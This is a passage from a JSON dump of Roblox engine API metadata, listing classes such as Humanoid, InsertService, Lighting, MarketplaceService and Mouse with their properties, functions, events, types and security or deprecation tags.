ype":"bool"}],"Name":"Ragdoll","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"speed","Type":"float"}],"Name":"Running","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"},{"Name":"currentSeatPart","Type":"Instance"}],"Name":"Seated","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"old","Type":"HumanoidStateType"},{"Name":"new","Type":"HumanoidStateType"}],"Name":"StateChanged","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"state","Type":"HumanoidStateType"},{"Name":"isEnabled","Type":"bool"}],"Name":"StateEnabledChanged","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"status","Type":"Status"}],"Name":"StatusAdded","tags":["deprecated"],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"status","Type":"Status"}],"Name":"StatusRemoved","tags":["deprecated"],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"Strafing","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"speed","Type":"float"}],"Name":"Swimming","tags":[],"Class":"Humanoid","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"InputObject","tags":["notCreatable"]},{"ValueType":"Vector3","type":"Property","Name":"Delta","tags":[],"Class":"InputObject"},{"ValueType":"KeyCode","type":"Property","Name":"KeyCode","tags":[],"Class":"InputObject"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"InputObject"},{"ValueType":"UserInputState","type":"Property","Name":"UserInputState","tags":[],"Class":"InputObject"},{"ValueType":"UserInputType","type":"Property","Name":"UserInputType","tags":[],"Class":"InputObject"},{"Superclass":"Instance","type":"Class","Name":"InsertService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"AllowInsertFreeModels","tags":[],"Class":"InsertService"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"ApproveAssetId","tags":["deprecated"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetVersionId","Default":null}],"Name":"ApproveAssetVersionId","tags":["deprecated"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"instance","Default":null}],"Name":"Insert","tags":["deprecated"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enable","Default":null},{"Type":"bool","Name":"user","Default":"false"}],"Name":"SetAdvancedResults","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"assetUrl","Default":null}],"Name":"SetAssetUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"assetVersionUrl","Default":null}],"Name":"SetAssetVersionUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"baseSetsUrl","Default":null}],"Name":"SetBaseCategoryUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"baseSetsUrl","Default":null}],"Name":"SetBaseSetsUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"collectionUrl","Default":null}],"Name":"SetCollectionUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"freeDecalUrl","Default":null}],"Name":"SetFreeDecalUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"freeModelUrl","Default":null}],"Name":"SetFreeModelUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"trustLevel","Default":null}],"Name":"SetTrustLevel","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"userSetsUrl","Default":null}],"Name":"SetUserCategoryUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"userSetsUrl","Default":null}],"Name":"SetUserSetsUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetBaseCategories","tags":["deprecated"],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[],"Name":"GetBaseSets","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"categoryId","Default":null}],"Name":"GetCollection","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"string","Name":"searchText","Default":null},{"Type":"int","Name":"pageNum","Default":null}],"Name":"GetFreeDecals","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"string","Name":"searchText","Default":null},{"Type":"int","Name":"pageNum","Default":null}],"Name":"GetFreeModels","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"GetLatestAssetVersionAsync","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetUserCategories","tags":["deprecated"],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetUserSets","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"LoadAsset","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"assetVersionId","Default":null}],"Name":"LoadAssetVersion","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"loadAsset","tags":["deprecated"],"Class":"InsertService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"InstancePacketCache","tags":[]},{"Superclass":"Instance","type":"Class","Name":"IntConstrainedValue","tags":[]},{"ValueType":"int","type":"Property","Name":"ConstrainedValue","tags":["hidden"],"Class":"IntConstrainedValue"},{"ValueType":"int","type":"Property","Name":"MaxValue","tags":[],"Class":"IntConstrainedValue"},{"ValueType":"int","type":"Property","Name":"MinValue","tags":[],"Class":"IntConstrainedValue"},{"ValueType":"int","type":"Property","Name":"Value","tags":[],"Class":"IntConstrainedValue"},{"Arguments":[{"Name":"value","Type":"int"}],"Name":"Changed","tags":[],"Class":"IntConstrainedValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"int"}],"Name":"changed","tags":["deprecated"],"Class":"IntConstrainedValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"IntValue","tags":[]},{"ValueType":"int","type":"Property","Name":"Value","tags":[],"Class":"IntValue"},{"Arguments":[{"Name":"value","Type":"int"}],"Name":"Changed","tags":[],"Class":"IntValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"int"}],"Name":"changed","tags":["deprecated"],"Class":"IntValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"JointInstance","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"C0","tags":[],"Class":"JointInstance"},{"ValueType":"CoordinateFrame","type":"Property","Name":"C1","tags":[],"Class":"JointInstance"},{"ValueType":"Object","type":"Property","Name":"Part0","tags":[],"Class":"JointInstance"},{"ValueType":"Object","type":"Property","Name":"Part1","tags":[],"Class":"JointInstance"},{"ValueType":"Object","type":"Property","Name":"part1","tags":["deprecated","hidden"],"Class":"JointInstance"},{"Superclass":"JointInstance","type":"Class","Name":"DynamicRotate","tags":[]},{"ValueType":"float","type":"Property","Name":"BaseAngle","tags":[],"Class":"DynamicRotate"},{"Superclass":"DynamicRotate","type":"Class","Name":"RotateP","tags":[]},{"Superclass":"DynamicRotate","type":"Class","Name":"RotateV","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"Glue","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"F0","tags":[],"Class":"Glue"},{"ValueType":"Vector3","type":"Property","Name":"F1","tags":[],"Class":"Glue"},{"ValueType":"Vector3","type":"Property","Name":"F2","tags":[],"Class":"Glue"},{"ValueType":"Vector3","type":"Property","Name":"F3","tags":[],"Class":"Glue"},{"Superclass":"JointInstance","type":"Class","Name":"ManualSurfaceJointInstance","tags":[]},{"Superclass":"ManualSurfaceJointInstance","type":"Class","Name":"ManualGlue","tags":[]},{"Superclass":"ManualSurfaceJointInstance","type":"Class","Name":"ManualWeld","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"Motor","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentAngle","tags":[],"Class":"Motor"},{"ValueType":"float","type":"Property","Name":"DesiredAngle","tags":[],"Class":"Motor"},{"ValueType":"float","type":"Property","Name":"MaxVelocity","tags":[],"Class":"Motor"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"value","Default":null}],"Name":"SetDesiredAngle","tags":[],"Class":"Motor","type":"Function"},{"Superclass":"Motor","type":"Class","Name":"Motor6D","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"Rotate","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"Snap","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"VelocityMotor","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentAngle","tags":[],"Class":"VelocityMotor"},{"ValueType":"float","type":"Property","Name":"DesiredAngle","tags":[],"Class":"VelocityMotor"},{"ValueType":"Object","type":"Property","Name":"Hole","tags":[],"Class":"VelocityMotor"},{"ValueType":"float","type":"Property","Name":"MaxVelocity","tags":[],"Class":"VelocityMotor"},{"Superclass":"JointInstance","type":"Class","Name":"Weld","tags":[]},{"Superclass":"Instance","type":"Class","Name":"JointsService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[],"Name":"ClearJoinAfterMoveJoints","tags":[],"Class":"JointsService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"CreateJoinAfterMoveJoints","tags":[],"Class":"JointsService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"joinInstance","Default":null}],"Name":"SetJoinAfterMoveInstance","tags":[],"Class":"JointsService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"joinTarget","Default":null}],"Name":"SetJoinAfterMoveTarget","tags":[],"Class":"JointsService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ShowPermissibleJoints","tags":[],"Class":"JointsService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Keyframe","tags":[]},{"ValueType":"float","type":"Property","Name":"Time","tags":[],"Class":"Keyframe"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"pose","Default":null}],"Name":"AddPose","tags":[],"Class":"Keyframe","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetPoses","tags":[],"Class":"Keyframe","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"pose","Default":null}],"Name":"RemovePose","tags":[],"Class":"Keyframe","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"KeyframeSequence","tags":[]},{"ValueType":"bool","type":"Property","Name":"Loop","tags":[],"Class":"KeyframeSequence"},{"ValueType":"AnimationPriority","type":"Property","Name":"Priority","tags":[],"Class":"KeyframeSequence"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"keyframe","Default":null}],"Name":"AddKeyframe","tags":[],"Class":"KeyframeSequence","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetKeyframes","tags":[],"Class":"KeyframeSequence","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"keyframe","Default":null}],"Name":"RemoveKeyframe","tags":[],"Class":"KeyframeSequence","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"KeyframeSequenceProvider","tags":[]},{"ReturnType":"Instance","Arguments":[{"Type":"Content","Name":"assetId","Default":null}],"Name":"GetKeyframeSequence","tags":[],"Class":"KeyframeSequenceProvider","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"assetId","Default":null},{"Type":"bool","Name":"useCache","Default":null}],"Name":"GetKeyframeSequenceById","tags":[],"Class":"KeyframeSequenceProvider","type":"Function"},{"ReturnType":"Content","Arguments":[{"Type":"Instance","Name":"keyframeSequence","Default":null}],"Name":"RegisterActiveKeyframeSequence","tags":[],"Class":"KeyframeSequenceProvider","type":"Function"},{"ReturnType":"Content","Arguments":[{"Type":"Instance","Name":"keyframeSequence","Default":null}],"Name":"RegisterKeyframeSequence","tags":[],"Class":"KeyframeSequenceProvider","type":"Function"},{"ReturnType":"Dictionary","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"page","Default":"1"}],"Name":"GetAnimations","tags":[],"Class":"KeyframeSequenceProvider","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"Light","tags":[]},{"ValueType":"float","type":"Property","Name":"Brightness","tags":[],"Class":"Light"},{"ValueType":"Color3","type":"Property","Name":"Color","tags":[],"Class":"Light"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Light"},{"ValueType":"bool","type":"Property","Name":"Shadows","tags":[],"Class":"Light"},{"Superclass":"Light","type":"Class","Name":"PointLight","tags":[]},{"ValueType":"float","type":"Property","Name":"Range","tags":[],"Class":"PointLight"},{"Superclass":"Light","type":"Class","Name":"SpotLight","tags":[]},{"ValueType":"float","type":"Property","Name":"Angle","tags":[],"Class":"SpotLight"},{"ValueType":"NormalId","type":"Property","Name":"Face","tags":[],"Class":"SpotLight"},{"ValueType":"float","type":"Property","Name":"Range","tags":[],"Class":"SpotLight"},{"Superclass":"Light","type":"Class","Name":"SurfaceLight","tags":[]},{"ValueType":"float","type":"Property","Name":"Angle","tags":[],"Class":"SurfaceLight"},{"ValueType":"NormalId","type":"Property","Name":"Face","tags":[],"Class":"SurfaceLight"},{"ValueType":"float","type":"Property","Name":"Range","tags":[],"Class":"SurfaceLight"},{"Superclass":"Instance","type":"Class","Name":"Lighting","tags":["notCreatable"]},{"ValueType":"Color3","type":"Property","Name":"Ambient","tags":[],"Class":"Lighting"},{"ValueType":"float","type":"Property","Name":"Brightness","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"ColorShift_Bottom","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"ColorShift_Top","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"FogColor","tags":[],"Class":"Lighting"},{"ValueType":"float","type":"Property","Name":"FogEnd","tags":[],"Class":"Lighting"},{"ValueType":"float","type":"Property","Name":"FogStart","tags":[],"Class":"Lighting"},{"ValueType":"float","type":"Property","Name":"GeographicLatitude","tags":[],"Class":"Lighting"},{"ValueType":"bool","type":"Property","Name":"GlobalShadows","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"OutdoorAmbient","tags":[],"Class":"Lighting"},{"ValueType":"bool","type":"Property","Name":"Outlines","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"ShadowColor","tags":[],"Class":"Lighting"},{"ValueType":"string","type":"Property","Name":"TimeOfDay","tags":[],"Class":"Lighting"},{"ReturnType":"double","Arguments":[],"Name":"GetMinutesAfterMidnight","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetMoonDirection","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"GetMoonPhase","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetSunDirection","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"minutes","Default":null}],"Name":"SetMinutesAfterMidnight","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"getMinutesAfterMidnight","tags":["deprecated"],"Class":"Lighting","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"minutes","Default":null}],"Name":"setMinutesAfterMidnight","tags":["deprecated"],"Class":"Lighting","type":"Function"},{"Arguments":[{"Name":"skyboxChanged","Type":"bool"}],"Name":"LightingChanged","tags":[],"Class":"Lighting","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"LocalWorkspace","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"LogService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"source","Default":null}],"Name":"ExecuteScript","tags":["RobloxScriptSecurity"],"Class":"LogService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetLogHistory","tags":[],"Class":"LogService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RequestServerOutput","tags":["RobloxScriptSecurity"],"Class":"LogService","type":"Function"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"messageType","Type":"MessageType"}],"Name":"MessageOut","tags":[],"Class":"LogService","type":"Event"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"messageType","Type":"MessageType"},{"Name":"timestamp","Type":"int"}],"Name":"ServerMessageOut","tags":["RobloxScriptSecurity"],"Class":"LogService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"LoginService","tags":[]},{"ReturnType":"void","Arguments":[],"Name":"Logout","tags":["RobloxSecurity"],"Class":"LoginService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"PromptLogin","tags":["RobloxSecurity"],"Class":"LoginService","type":"Function"},{"Arguments":[{"Name":"loginError","Type":"string"}],"Name":"LoginFailed","tags":["RobloxSecurity"],"Class":"LoginService","type":"Event"},{"Arguments":[{"Name":"username","Type":"string"}],"Name":"LoginSucceeded","tags":["RobloxSecurity"],"Class":"LoginService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"LuaSettings","tags":[]},{"ValueType":"bool","type":"Property","Name":"AreScriptStartsReported","tags":[],"Class":"LuaSettings"},{"ValueType":"double","type":"Property","Name":"DefaultWaitTime","tags":[],"Class":"LuaSettings"},{"ValueType":"int","type":"Property","Name":"GcFrequency","tags":[],"Class":"LuaSettings"},{"ValueType":"int","type":"Property","Name":"GcLimit","tags":[],"Class":"LuaSettings"},{"ValueType":"int","type":"Property","Name":"GcPause","tags":[],"Class":"LuaSettings"},{"ValueType":"int","type":"Property","Name":"GcStepMul","tags":[],"Class":"LuaSettings"},{"ValueType":"float","type":"Property","Name":"WaitingThreadsBudget","tags":[],"Class":"LuaSettings"},{"Superclass":"Instance","type":"Class","Name":"LuaSourceContainer","tags":[]},{"Superclass":"LuaSourceContainer","type":"Class","Name":"BaseScript","tags":[]},{"ValueType":"bool","type":"Property","Name":"Disabled","tags":[],"Class":"BaseScript"},{"ValueType":"Content","type":"Property","Name":"LinkedSource","tags":[],"Class":"BaseScript"},{"Superclass":"BaseScript","type":"Class","Name":"CoreScript","tags":["notCreatable"]},{"Superclass":"BaseScript","type":"Class","Name":"Script","tags":[]},{"ValueType":"ProtectedString","type":"Property","Name":"Source","tags":["PluginSecurity"],"Class":"Script"},{"ReturnType":"string","Arguments":[],"Name":"GetHash","tags":["RobloxPlaceSecurity"],"Class":"Script","type":"Function"},{"Superclass":"Script","type":"Class","Name":"LocalScript","tags":[]},{"Superclass":"LuaSourceContainer","type":"Class","Name":"ModuleScript","tags":[]},{"ValueType":"Content","type":"Property","Name":"LinkedSource","tags":[],"Class":"ModuleScript"},{"ValueType":"ProtectedString","type":"Property","Name":"Source","tags":["PluginSecurity"],"Class":"ModuleScript"},{"Superclass":"Instance","type":"Class","Name":"LuaWebService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"MarketplaceService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"string","Name":"productId","Default":null}],"Name":"PromptNativePurchase","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"productId","Default":null},{"Type":"bool","Name":"equipIfPurchased","Default":"true"},{"Type":"CurrencyType","Name":"currencyType","Default":"Default"}],"Name":"PromptProductPurchase","tags":[],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"assetId","Default":null},{"Type":"bool","Name":"equipIfPurchased","Default":"true"},{"Type":"CurrencyType","Name":"currencyType","Default":"Default"}],"Name":"PromptPurchase","tags":[],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"string","Name":"productId","Default":null}],"Name":"PromptThirdPartyPurchase","tags":["RobloxPlaceSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"assetId","Default":null},{"Type":"int","Name":"robuxAmount","Default":null}],"Name":"ReportAssetSale","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ReportRobuxUpsellStarted","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"ticket","Default":null},{"Type":"int","Name":"playerId","Default":null},{"Type":"int","Name":"productId","Default":null}],"Name":"SignalClientPurchaseSuccess","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"productId","Default":null},{"Type":"bool","Name":"success","Default":null}],"Name":"SignalPromptProductPurchaseFinished","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"assetId","Default":null},{"Type":"bool","Name":"success","Default":null}],"Name":"SignalPromptPurchaseFinished","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SignalServerLuaDialogClosed","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetDeveloperProductsAsync","tags":[],"Class":"MarketplaceService","type":"YieldFunction"},{"ReturnType":"Dictionary","Arguments":[{"Type":"int","Name":"assetId","Default":null},{"Type":"InfoType","Name":"infoType","Default":"Asset"}],"Name":"GetProductInfo","tags":[],"Class":"MarketplaceService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"assetId","Default":null}],"Name":"PlayerOwnsAsset","tags":[],"Class":"MarketplaceService","type":"YieldFunction"},{"Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"ClientLuaDialogRequested","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"ticket","Type":"string"},{"Name":"playerId","Type":"int"},{"Name":"productId","Type":"int"}],"Name":"ClientPurchaseSuccess","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"productId","Type":"string"},{"Name":"wasPurchased","Type":"bool"}],"Name":"NativePurchaseFinished","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"userId","Type":"int"},{"Name":"productId","Type":"int"},{"Name":"isPurchased","Type":"bool"}],"Name":"PromptProductPurchaseFinished","tags":["deprecated"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"productId","Type":"int"},{"Name":"equipIfPurchased","Type":"bool"},{"Name":"currencyType","Type":"CurrencyType"}],"Name":"PromptProductPurchaseRequested","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"assetId","Type":"int"},{"Name":"isPurchased","Type":"bool"}],"Name":"PromptPurchaseFinished","tags":[],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"assetId","Type":"int"},{"Name":"equipIfPurchased","Type":"bool"},{"Name":"currencyType","Type":"CurrencyType"}],"Name":"PromptPurchaseRequested","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"serverResponseTable","Type":"Dictionary"}],"Name":"ServerPurchaseVerification","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"productId","Type":"string"},{"Name":"receipt","Type":"string"},{"Name":"wasPurchased","Type":"bool"}],"Name":"ThirdPartyPurchaseFinished","tags":["RobloxPlaceSecurity"],"Class":"MarketplaceService","type":"Event"},{"ReturnType":"ProductPurchaseDecision","Arguments":[{"Name":"receiptInfo","Type":"Dictionary"}],"Name":"ProcessReceipt","tags":[],"Class":"MarketplaceService","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"Message","tags":["deprecated"]},{"ValueType":"string","type":"Property","Name":"Text","tags":[],"Class":"Message"},{"Superclass":"Message","type":"Class","Name":"Hint","tags":["deprecated"]},{"Superclass":"Instance","type":"Class","Name":"Mouse","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"Hit","tags":["readonly"],"Class":"Mouse"},{"ValueType":"Content","type":"Property","Name":"Icon","tags":[],"Class":"Mouse"},{"ValueType":"CoordinateFrame","type":"Property","Name":"Origin","tags":["readonly"],"Class":"Mouse"},{"ValueType":"Object","type":"Property","Name":"Target","tags":["readonly"],"Class":"Mouse"},{"ValueType":"Object","type":"Property","Name":"TargetFilter","tags":[],"Class":"Mouse"},{"ValueType":"NormalId","type":"Property","Name":"TargetSurface","tags":["readonly"],"Class":"Mouse"},{"ValueType":"Ray","type":"Property","Name":"UnitRay","tags":["readonly"],"Class":"Mouse"},{"ValueType":"int","type":"Property","Name":"ViewSizeX","tags":["readonly"],"Class":"Mouse"},{"ValueType":"int","type":"Property","Name":"ViewSizeY","tags":["readonly"],"Class":"Mouse"},{"ValueType":"int","type":"Property","Name":"X","tags":["readonly"],"Class":"Mouse"},{"ValueType":"int","type":"Property","Name":"Y","tags":["readonly"],"Class":"Mouse"},{"ValueType":"CoordinateFrame","type":"Property","Name":"hit","tags":["deprecated","hidden","readonly"],"Class":"Mouse"},{"ValueType":"Object","type":"Property","Name":"target","tags":["deprecated","readonly"],"Class":"Mouse"},{"Arguments":[],"Name":"Button1Down","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Button1Up","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Button2Down","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Button2Up","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Idle","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[{"Name":"key","Type":"string"}],"Name":"KeyDown","tags":["deprecated"],"Class":"Mouse","type":"Event"},{"Arguments":[{"Name":"key","Type":"string"}],"Name":"KeyUp","tags":["deprecated"],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Move","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"WheelBackward","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"WheelForward","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[{"Name":"key","Type":"string"}],"Name":"keyDown","tags":["deprecated"],"Class":"Mouse","type":"Event"},{"Superclass":"Mouse","type":"Class","Name":"PlayerMouse","tags":[]},{"Superclass":"Mouse","type":"Class","Name":"PluginMouse","tags":[]},{"Arguments":[{"Name":"instances","Type":"Objects"}],"Name":"DragEnter","tags":["PluginSecurity"],"Class":"PluginMouse","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"NetworkMarker","tags":["notbrowsable"]},{"Arguments":[],"Name":"Received","tags":[],"Class":"NetworkMarker","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"NetworkPeer","tags":["notbrowsable"]},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"limit","Default":null}],"Name":"SetOutgoingKBPSLimit","tags":["PluginSecurity"],"Class":"NetworkPeer","type":"Function"},{"Superclass":"NetworkPeer","type":"Class","Name":"NetworkClient","tags":["notCreatable"]},{"ValueType":"string","type":"Property","Name":"Ticket","tags":[],"Class":"NetworkClient"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"blockDuration","Default":"3000"}],"Name":"Disconnect","tags":["LocalUserSecurity"],"Class":"NetworkClient","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"string","Name":"server","Default":null},{"Type":"int","Name":"serverPort","Default":null},{"Type":"int","Name":"clientPort","Default":"0"},{"Type":"int","Name":"threadSleepTime","Default":"30"}],"Name":"PlayerConnect","tags":["PluginSecurity"],"Class":"NetworkClient","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"gameSessionID","Default":null}],"Name":"SetGameSessionID","tags":["RobloxSecurity"],"Class":"NetworkClient","type":"Function"},{"Arguments":[{"Name":"peer","Type":"string"},{"Name":"replicator","Type":"Instance"}],"Name":"ConnectionAccepted","tags":[],"Class":"NetworkClient","type":"Event"},{"Arguments":[{"Name":"peer","Type":"string"},{"Name":"code","Type":"int"},{"Name":"reason","Type":"string"}],"Name":"ConnectionFailed","tags":[],"Class":"NetworkClient","type":"Event"},{"Arguments":[{"Name":"peer","Type":"string"}],"Name":"ConnectionRejected","tags":[],"Class":"NetworkClient","type"